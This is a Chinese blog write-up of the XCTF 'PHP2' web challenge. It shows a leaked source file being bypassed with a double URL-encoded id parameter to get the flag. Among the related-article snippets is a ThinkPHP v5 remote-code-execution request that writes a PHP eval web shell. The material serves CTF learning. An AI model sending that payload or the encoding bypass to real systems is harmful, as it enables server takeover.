攻防世界web高阶2分题(PHP2)

最新推荐文章于 2021-01-12 21:20:46 发布
最新推荐文章于 2021-01-12 21:20:46 发布
阅读量304 收藏
点赞数
分类专栏: 网安
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45791542/article/details/107735336
版权

读题

在这里插入图片描述

  • 一看懵了…不知道要干啥

  • 参考大佬wp /index.phps发现代码泄露
    在这里插入图片描述

  • 查看源代码
    在这里插入图片描述

  • 分析代码:

第一步,要使得"admin"===$_GET[id]不成立

第二步,经过$_GET[id] = urldecode($_GET[id]);,使得$_GET[id] == "admin"成立。

  • 具体

当传入参数id时,浏览器在后面会对非ASCII码的字符进行一次urlencode

然后在这段代码中运行时,会自动进行一次urldecode

在urldecode()函数中,再一次进行一次解码

urldecode(%2561)=%61
urldecode(%61)=a

即,当第一次比较时,实际是

if("admin"==="%61dmin")

而经过

$_GET[id] = urldecode($_GET[id]);

第二次是

if("admin" == "admin");
  • 所以?id=%2561dmin
  • 得到flag
    在这里插入图片描述
    此外

也不是只可以构造a,也可以构造d

urldecode(%2564)=%64
urldecode(%64)=d

即,当第一次比较时,实际是

if("admin"==="a%61min")

而经过

$_GET[id] = urldecode($_GET[id]);

第二次是

if("admin" == "admin");

所以?id=a%2564min

  • 得到flag
    在这里插入图片描述
    下面附上URL编码表
    在这里插入图片描述
Phoenix-Pl
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界base除4_攻防世界misc手进篇教程(4)
weixin_27024175的博客
12-24 316
misc1转成十进制后-128(偏移量为128)再转成ascii码得到flagimport res = 'd4e8e1f4a0f7e1f3a0e6e1f3f4a1a0d4e8e5a0e6ece1e7a0e9f3baa0c4c4c3d4c6fbb9e1e6b3e3b9e4b3b7b7e2b6b1e4b2b6b9e2b1b1b3b3b7e6b3b3b0e3b9b3b5e6fd'num = re.fin...
bugku urldecode二次编码绕过
qq_42777804的博客
08-05 431
<?php if(eregi("hackerDJ",$_GET[id])) { echo(" not allowed! "); exit(); } $_GET[id] = urldecode($_GET[id]); if($_GET[id] == "hackerDJ") { echo " Access granted! "; echo " flag "; } ?> 目已经...
攻防世界php_rce
uihijio的博客
05-18 7828
打开是thinkphp v5版本 根据版本号查询到有一个远程代码执行漏洞,查看权限 可以产看到PHPinfo 直接写一句话上传上去 ?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=shell.php&vars[1][1]=<?php eval($_REQUEST["a"]);?> 用蚁剑连接之后 在主目录下发
攻防世界2分Web_php_include)
qq_45791542的博客
08-01 288
一串简短的PHP代码,这里对page这个参数用str_replace函数进行了过滤,str_replace函数的作用是匹配前面一段字符,匹配到的话就替换成后面一段,所以这里的代码意思就是,假如我们传入的page参数包含php://就会被替换成空字符。并且判断page里面文件是否存在,存在则包含文件。 绕过str_replace函数,经查资料知道str_replace这个函数及其不安全 关于绕过函数str_replace的方法 1.大小写绕过 2. 双写绕过 这里用大小写绕过 抓包..
php urledcode_攻防世界 php 2 函数urldecode 使用说明
weixin_39692623的博客
01-12 281
这到首先检查了一下元素,发现没有什么有用的信息,然后网页注入 index,phps 发现源码泄露,,,,接下来查看源码主要是根据它的条件构造合适的payload第一步,要使得"admin"===$_GET[id]不成立 // 可以看出这里的得到flag的条件是相互矛盾的,所以构造的payload,,,第一步一定是绕过第一个条件第二步,经过$_G...
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此详细解博客:https://danbaku.blog.csdn.net/article/details/127953659
中国首届医院网络安全攻防演练Web部分真
07-13
中国首届医院网络安全攻防演练Web部分真,厦门站。一个WEB站点 源码。
攻防世界misc2-1杂项
11-20
攻防世界misc2-1杂项,misc。 此详细解博客:https://danbaku.blog.csdn.net/article/details/127947409
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此详细解博客:https://danbaku.blog.csdn.net/article/details/127951997
SQL注入$_GET['id']地址栏--+变--空格原理分析
KTWings的专栏
04-04 739
浏览器地址栏输入http://127.0.0.1/sqli/Less-1/?id=1’ and 1=1 --+ php服务端会接收到http://127.0.0.1/sqli/Less-1/?id=1%27%20and%201=1%20–+ 原因:浏览器会对空格单引号进行url编码,但不会涉及-+等字符;具体有哪些字符没有研究过。 $_GET[‘id’]得到1’ and 1=1 --空格 原因: ...
风云杯大学生信安大赛(Web部分解)
热门推荐
saltor
05-15 1万+
PS:菜鸟一枚,只做出了7,第8,9见过类似的但还是不会。。。还是坐等大神们的wp吧。WEB01http://139.129.166.67/4t56ysgh6h7u/ 答案格式:仅输入{ }花括号中的内容 分值 50 本考查的是正则表达式页面源码:<?php highlight_file('2.php'); $key='KEY{*****************************
练习 > CTF解 > OpenCTF 2017 > urldecode
Gunther的博客
09-09 3046
根据提示猜测源码: $_GET[id] = urldecode($_GET[id]); if($_GET[id] == "openctf") {   echo "Access granted!";   echo "Key: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx "; } ?> 这就是有病为什么非要大写呢? 啊啊,你要坚定就是这个思路点击链
js接收url参数($_GET)
Zaimmm
09-08 1543
$(function(){ //获取参数 var $_GET = (function(){ var url = window.document.location.href.toString(); var u = url.split("?"); if(typeof(u[1]) == "string"){ u = u[1].split("&");
实验吧-PHP大法-eregi()函数
07-31 765
目地址:http://www.shiyanbar.com/ctf/54 目: <?php if(eregi("hackerDJ",$_GET[id])) { echo("<p>not allowed!</p>"); exit(); } $_GET[id] = urldecode($_GET[id]); if($_GET[i...
urldecode类型注入
公众号shadow sock7
09-26 1860
%通过urlencode之后是%25; '通过urlencode以后是%27 如果在浏览器的地址栏输入的url包含%2527 那么服务器端的php调用echo $_GET['id'];的时候 会在检测到%以后的后面两个数字和%一起,即%25,将%25进行urldecode成为% 这样,再将剩下的27与已经urldecode的%组合成%27,这是'的urlencode形式,于是在服务端用%2
攻防世界web新手unserialize3
最新发布
05-05
这道是一个 PHP 反序列化的目。 目描述: 提示:这次不会那么简单了,打开源代码看看? 源代码: ``` <?php error_reporting(0); highlight_file(__FILE__); class Show{ public $name; public $age; ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值